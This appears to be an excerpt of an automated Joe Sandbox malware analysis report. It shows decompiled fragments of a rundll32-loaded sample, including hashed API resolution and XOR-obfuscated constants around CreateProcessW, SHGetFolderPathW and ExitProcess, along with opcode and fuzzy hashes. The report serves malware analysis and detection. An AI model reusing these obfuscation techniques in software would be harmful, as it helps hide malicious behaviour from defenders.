                                                                                                                    • API ID: AllocVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4275171209-0
                                                                                                                    • Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                    • Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
                                                                                                                    • Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                    • Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 275 357f5d-357ff1 call 3620b9 call 36aa30 CreateProcessW
                                                                                                                    APIs
                                                                                                                    • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,0035AD99,?,?,?,181C8C04,0035AD99), ref: 00357FEB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.544152494.0000000000351000.00000020.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: true
                                                                                                                    • Associated: 0000000B.00000002.544143882.0000000000350000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000000B.00000002.544169639.0000000000373000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_350000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 963392458-0
                                                                                                                    • Opcode ID: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                    • Instruction ID: 67493390a63192565c6692d5d2e9b810ea0e9a74f58fd73f0d09d58dde647ddb
                                                                                                                    • Opcode Fuzzy Hash: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                    • Instruction Fuzzy Hash: B511D372402128BBDF629F91DD09CEF7F79EF093A4F149144FA1925121D2728A60EBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 280 3646bb-36473b call 3620b9 call 36aa30 SHGetFolderPathW
                                                                                                                    C-Code - Quality: 58%
                                                                                                                    			E003646BB(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				intOrPtr _v16;
                                                                                                                    				intOrPtr _v20;
                                                                                                                    				void* _t21;
                                                                                                                    				intOrPtr* _t25;
                                                                                                                    				void* _t26;
                                                                                                                    
                                                                                                                    				E003620B9(_t21);
                                                                                                                    				_v20 = 0x3f5bb0;
                                                                                                                    				_v16 = 0;
                                                                                                                    				_v12 = 0x996874;
                                                                                                                    				_v12 = _v12 << 0xf;
                                                                                                                    				_v12 = _v12 ^ 0xb43bad9d;
                                                                                                                    				_v8 = 0xebf0af;
                                                                                                                    				_v8 = _v8 ^ 0x3b7dcb24;
                                                                                                                    				_v8 = _v8 ^ 0x3b96d1fd;
                                                                                                                    				_t25 = E0036AA30(0x220, 0xdf0d4f1a, __ecx, 0x54d725f);
                                                                                                                    				_t26 =  *_t25(0, _a24, 0, 0, _a4, __ecx, __edx, _a4, 0, 0, 0, _a20, _a24, _a28); // executed
                                                                                                                    				return _t26;
                                                                                                                    			}











                                                                                                                    APIs
                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,B43BAD9D), ref: 00364735
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.544152494.0000000000351000.00000020.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: true
                                                                                                                    • Associated: 0000000B.00000002.544143882.0000000000350000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000000B.00000002.544169639.0000000000373000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_350000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FolderPath
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1514166925-0
                                                                                                                    • Opcode ID: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                    • Instruction ID: 88daeeae8280efb800bab7eae321b5e3b19ee9df9ddb2c05b39f1f19e4b8a922
                                                                                                                    • Opcode Fuzzy Hash: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                    • Instruction Fuzzy Hash: 2301EC75801218BBCF15AFD5DC498DFBFB8EF45394F108145F91866211D2758A60DBD1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 285 3593ed-359461 call 36aa30 ExitProcess
                                                                                                                    C-Code - Quality: 73%
                                                                                                                    			E003593ED() {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				void* _v24;
                                                                                                                    				intOrPtr _v28;
                                                                                                                    				void* _t24;
                                                                                                                    
                                                                                                                    				_v28 = 0xda6c64;
                                                                                                                    				asm("stosd");
                                                                                                                    				asm("stosd");
                                                                                                                    				asm("stosd");
                                                                                                                    				_v12 = 0x88a564;
                                                                                                                    				_v12 = _v12 | 0x9bf5ed5c;
                                                                                                                    				_v12 = _v12 ^ 0x9bf17c37;
                                                                                                                    				_v8 = 0xd9241f;
                                                                                                                    				_v8 = _v8 * 0x5c;
                                                                                                                    				_v8 = _v8 + 0xccdd;
                                                                                                                    				_v8 = _v8 + 0x903;
                                                                                                                    				_v8 = _v8 ^ 0x4e0c4bb2;
                                                                                                                    				E0036AA30(0x1d2, 0x9df7cc0d, _t24, 0x98a8878d);
                                                                                                                    				ExitProcess(0);
                                                                                                                    			}









                                                                                                                    APIs
                                                                                                                    • ExitProcess.KERNELBASE(00000000), ref: 0035945B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.544152494.0000000000351000.00000020.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: true
                                                                                                                    • Associated: 0000000B.00000002.544143882.0000000000350000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000000B.00000002.544169639.0000000000373000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_350000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ExitProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 621844428-0
                                                                                                                    • Opcode ID: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                    • Instruction ID: 884355c262a7d26c596c9815b2c7dae278c60910631b12c29d95fa6c395fb61a
                                                                                                                    • Opcode Fuzzy Hash: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                    • Instruction Fuzzy Hash: 88F03C71901308FBEB04DBE8DA4699DFBB4EB50314F2081A9DA04B7261E7705F459A91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 305 35b23c-35b2c6 call 3620b9 call 36aa30 lstrcmpiW
                                                                                                                    C-Code - Quality: 58%
                                                                                                                    			E0035B23C(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				void* _t27;
                                                                                                                    				int _t32;
                                                                                                                    
                                                                                                                    				_push(__ecx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				_push(_a16);
                                                                                                                    				_push(_a12);
                                                                                                                    				_push(_a8);
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E003620B9(_t27);
                                                                                                                    				_v12 = 0x6268;
                                                                                                                    				_v12 = _v12 ^ 0x57e834c3;
                                                                                                                    				_v12 = _v12 + 0xffff2919;
                                                                                                                    				_v12 = _v12 + 0xffff3e3d;
                                                                                                                    				_v12 = _v12 ^ 0x57e9dc2b;
                                                                                                                    				_v8 = 0xa46433;
                                                                                                                    				_v8 = _v8 + 0x98ba;
                                                                                                                    				_v8 = _v8 | 0xc390ebe9;
                                                                                                                    				_v8 = _v8 + 0xd5b0;
                                                                                                                    				_v8 = _v8 ^ 0xc3bab866;
                                                                                                                    				E0036AA30(0xb5, 0x9df7cc0d, __ecx, 0xaca78213);
                                                                                                                    				_t32 = lstrcmpiW(_a16, _a4); // executed
                                                                                                                    				return _t32;
                                                                                                                    			}








                                                                                                                    APIs
                                                                                                                    • lstrcmpiW.KERNELBASE(EE1E6DE5,57E9DC2B), ref: 0035B2C1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.544152494.0000000000351000.00000020.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: true
                                                                                                                    • Associated: 0000000B.00000002.544143882.0000000000350000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000000B.00000002.544169639.0000000000373000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_350000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1586166983-0
                                                                                                                    • Opcode ID: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                    • Instruction ID: ee8f51d14b79bb4de0034b5e5a8fff4a9f0d118976ad77c37a1796209bfee1de
                                                                                                                    • Opcode Fuzzy Hash: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                    • Instruction Fuzzy Hash: A00116B2C04608FFDF45DFD4DD468AEBBB5EB44304F208189B90566262E3728B60AB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%